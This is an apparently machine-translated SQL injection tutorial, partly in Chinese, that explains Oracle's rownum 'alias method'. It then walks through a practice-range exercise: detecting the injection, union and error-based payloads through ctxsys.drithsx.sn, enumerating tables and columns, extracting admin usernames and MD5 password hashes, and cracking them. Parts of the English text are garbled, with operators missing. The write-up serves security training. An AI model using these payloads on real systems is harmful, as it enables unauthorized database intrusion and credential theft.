Detailed example of the use of alias method in Oracle database injection

This article brings you relevant knowledge about Oracle, which mainly introduces the detailed explanation of the usage of alias method in Oracle database injection, including the basic statements of Oracle query information, rownum Let’s take a look at the features and so on. I hope it will be helpful to everyone.

Recommended tutorial: "Oracle Video Tutorial"

1. Introduction to Oracle Database

Oracle Database, also known as Oracle RDBMS, or Oracle for short. This database is a product of Oracle. It has powerful functions and complex operations. It is free to use but the service is charged. Currently, it is generally used by large companies in China, such as banks, financial institutions, and companies in the big data industry.

Summary of Oracle features:
1. Oracle needs to follow the table name when using query language to obtain information. This is similar to Access. If there is no table, you can use the dual table. Dual is Oracle's virtual table. Grammar rules used to form select. Oracle guarantees that there will always be only one record in dual. If you query it directly, it will only display an When querying data like Union, the data type at the corresponding position must be consistent with the data type of the column in the table. You can also use NULL to replace some data type positions that cannot be quickly guessed. This is similar to SQL Server. 3. Oracle is different from mysql. There is no limit in paging, but three-layer query nesting is used to implement paging; 4. Oracle’s single-line comment symbols are multi-line comment symbols;
5. Oracle database contains several These system tables store the table names and column names of the system database, such as user_tab_columns, all_tab_columns, all_tables, user_tables. The system table stores all the tables and column names of the user, where table_name represents the system Table name, column_name is the column name that exists in the system;
6. Oracle uses splicing strings (expressed using encoding in the URL), and the function can also realize the splicing of two strings;
7. In In Oracle, the library has been weakened and the users have been strengthened. The distinction is mainly based on users. The simple understanding is that the current user name is equivalent to the library name in other databases.

---

2. Introduction to aliasing method

(1) Basic statements for Oracle query information

select * from all_tables Query all Table
select * from user_tables Query all tables of the current user
select * from all_tab_columns Query all fields
select * from user_tab_columns Query the fields of the current user
select * from v$version Check the currently used Oracle version

(2) Rownum characteristics

Because it does not exist in Oracle limit, so querying specific data requires rownum to select. For example, first enter:

select * from all_tables
I see that the page outputs a lot of data, but most of it is not what we need, so suppose I just want If you want the first 4 pieces of data, then modify the statement as follows:

select * from all_tables where rownum
Then assuming that we only need the second piece of data, you can enter where rownum=2? Can't. This is because rownum is not the field name of a table, but the row number of the query result. Every time there is a result in the query, the first row, the second row, the third row, etc. will be defaulted. This rownum is the row number. , does not belong to a certain field, so rownum is a pseudo example that always starts with 1, rownum>n, when n>1, the condition cannot be established. For this situation, two methods can be used, namely the inequality method and the alias method.
When using query statements, we often ask to return the first n records in the table or the middle records. For example, in a large table (assuming there are 1W pieces of data), we need to query the records from 1000 to 1005. . Faced with this kind of inquiry, what should we do? Each database has its own solution. For example, in mysql, the limit command is used to page the results, in MSSQL, TOP is used to page the results, and Oracle mainly uses the rownum command to solve this problem. Let's take a look at how to output specified data in oracle.

(3) Not equal method

Enter this command in the online oracle drill platform (here is to query all fields of the current user):
select* from user_tab_columns

The results show all current tables and corresponding field names. If I only want to display the contents of the ADMIN table, I can enter:
select* from user_tab_columns where table_name= 'ADMIN'

If I only want to display the second piece of data, how should I enter it? It is obviously not possible to directly add the condition rownum=2. Here you can use the inequality method to query:
select* from user_tab_columns where table_name='ADMIN' and COLUMN_NAME'UNAME

From here we can also see that the inequality method has drawbacks. This method can only be used when the amount of data is very small. When the amount of data is very large, the aliasing method introduced below needs to be used.

(4) Alias ​​method

Let’s take a look at this statement:
select column_name,rownum n from user_tab_columns

This sentence After executing the column name query, the query results will be numbered in order from top to bottom starting from 1. However, since rownum itself is not a field, the alias is given here as n. In this way, the function of this query statement is to query the column names and the row numbers corresponding to each column name, and store the row numbers uniformly in the n field.
Note that although we have created a new field n to store the row number at this time, it will not work if we add a condition immediately afterwards, such as where n=7, because this statement needs to be executed before n can be found. This field, so if you want to use the n field to query information, you need to put this statement as a whole in the subquery of other statements. In this way, after the sentence is executed, there is the n field, and then it can be used by other sentences. .
Now we first query the fields in the ADMIN table, enter this:
select column_name,rownum n from user_tab_columns where table_name='ADMIN'

here The query results will get two field names. The line number is the alias n we took, so the first field is the actual field name, and the second field is the alias n we took.
For example, the result of the subquery is:

field name	row number
aa	1
bb	2
cc	3
dd	#4

Then just enter:
select * from subquery where n=2, you can get the data bb. Similarly, which data you want, just make n equal to the corresponding number.
Therefore, as long as this sentence is written as a subquery, and the external query statement is used to query the results of this subquery, setting n=2, the second field can be obtained, so enter:
select * from (select column_name,rownum n from user_tab_columns where table_name='ADMIN')where n=2

The second field is successfully queried.
Note: When the alias method is used to name rownum n, the standard way of writing is rownum as n. To be more concise, just rownum n, separated by spaces.
You can use the alias method when querying fields, but can you use it when querying table names? The answer is yes.
Example:
select table_name,rownum n from user_tables

It can be seen that aliasing the table is the same as aliasing the field, and the usage is actually similar. I won’t go into details here.

---

3. Practical Operation at the Shooting Range

The above is just the theoretical basis. It is not that easy in actual operation. Let’s find a shooting range for actual operation. Take a look.
Take Fengshentai as an example, the address is http://o1.lab.aqlab.cn/?id=1

(1) Determine whether SQL injection

enters the shooting range, Seeing that there is a GET parameter in the address bar, of course, first try to see if there is SQL input:
Enter after id=1:
and 1=1, the page echoes normally
and 1=2, The page echo is abnormal
Change id=1 to id=2-1, and the page echo is normal.
It means there must be SQL injection.

(2) Query the number of fields on the current page

In actual combat, we don’t know what database the target website is, so why bother with so much and treat it as MYSQL Just do it, so here we first query the number of fields:
Enter order by 1, the page echo is normal;
Enter order by 5, the page echo is abnormal;
Enter order by 4, the page echo is normal;
Enter order by 5, the page echo is abnormal.
Indicates that the number of fields on the current page is 4.

(3) Try joint query

Enter after id=1:

union all select 1,2,3,4

The page echoes abnormally. It seems that the database is definitely not mysql, so try changing the number to null:

union all select null,null,null,null from dual

The page echo is normal. It seems that the target database has very strict grammatical requirements. Now let’s determine what data types the four fields are. Enter:

union all select 111,null,null,null from dual

. The page returns normal results, indicating that the first field is of numeric type. Press ctrl u to view the source code of the web page, search for 111, and see no obvious misalignment.

Try to make the current page report an error to see if there is any display misalignment:

and 1=2 union all select 111,null,null,null from dual

No obvious display misalignment is seen.
Continue to enter:

and 1=2 union all select 111,111,null,null from dual

The page returns an exception, indicating that the second field is not a numeric type.
Continue to enter:

and 1=2 union all select 111,'aa',null,null from dual

The page returns an exception, indicating that the second field is not of string type.
In fact, Oracle database has many data types, such as numerical values, strings, dates, binary, and large text. There are also some subdivided types. It is quite tedious to try one by one, so I will skip it here.
The third field is the same. It is found that it is neither a number nor a string, and there is no obvious misalignment.
Continue to query the fourth field:

and 1=2 union all select 111,null,null,111111 from dual

It is found that the page shows a new time.

When you see a time like this, you have to think of a timestamp, because computers start counting seconds from 8 o'clock on January 1, 1970.

(4) Query table name

Use the error injection function to query information, enter:

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))

Note: Error injection can only return a string instead of a table, so There must be restrictions at the end, that is, rownum=1, and only one row of data is taken. In addition, the 1 in the brackets of the function can be replaced by something else, either a numerical value or a string.

Get the table name ADMIN
Continue to enter:

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name'ADMIN'))

Get the second table name NEWS.
Next, when querying other tables, you cannot continue to use the inequality method. Instead, you must use the alias method mentioned above to construct a basic statement, and then modify the value of n to determine the name of the table that has not yet been queried:

and 1=ctxsys.drithsx.sn(1,(select table_name from (select table_name,rownum n from user_tables )where n =3))

The final tables to determine the current user are: ADMIN, NEWS, MD5

（五）查询字段名

接下来查询字段，ADMIN表显然更可能有我们想要查询的信息，因此先查询ADMIN表的内容，输入：

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=1))

得到第一个字段名为：UNAME
把n改为2继续输入：

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=2))

得到第二个字段为UPASS
把n改为3，继续输入：

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=3))

得到第三个字段为MD5
把n改为4，继续输入：

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=4))

没有结果了。可见ADMIN表中的字段为：UNAME、UPASS、MD5

（六）根据字段查询具体数据

字段和表名都有了，接下来查询具体的数据，为了方便，还是用别名法来查询：

and 1=ctxsys.drithsx.sn(1,(select UNAME from (select UNAME,rownum as n from ADMIN) where n=1))

注意报错函数的特殊性，因此这里不能用*来代替UNAME。
通过改变n的值可以得到UNAME中的全部用户名为：OCI、NF、QQ123。
用同样的方法继续查询UPASS字段的内容，输入：

and 1=ctxsys.drithsx.sn(1,(select UPASS from (select UPASS,rownum as n from ADMIN) where n=1))

改变n的值可以得到UPASS字段的三条记录分别为：
e10adc3949ba59abbe56e057f20f883e
2a61f8bcfe7535eadcfa69eb4406ceb9
654321
在cmd5.com中解密后结果分别为：
123456、未查到、654321

（七）提交flag

把每个md5值都提交到靶场，最终确定flag为：
2a61f8bcfe7535eadcfa69eb4406ceb9

---

四、小结

渗透测试人员在进行数据库注入时，总是会遇到查询指定数据的问题，对于不同的数据库虽然查询方法大同小异，但是很多细节如果没有搞好是很难完成渗透的，这就需要每一位渗透测试人员夯实理论基础，掌握每一种常用的方法，在面临实际问题的时候才能游刃有余。

本文重点介绍了Oracle数据库的特点以及注入时常用的别名法，分享了别名法在靶场中实操的过程，并分享了一个在线执行Oracle命令的平台希望能够为各位同行或爱好者解决相关问题提供参考。

推荐教程：《Oracle视频教程》

The above is the detailed content of Detailed example of the use of alias method in Oracle database injection. For more information, please follow other related articles on the PHP Chinese website!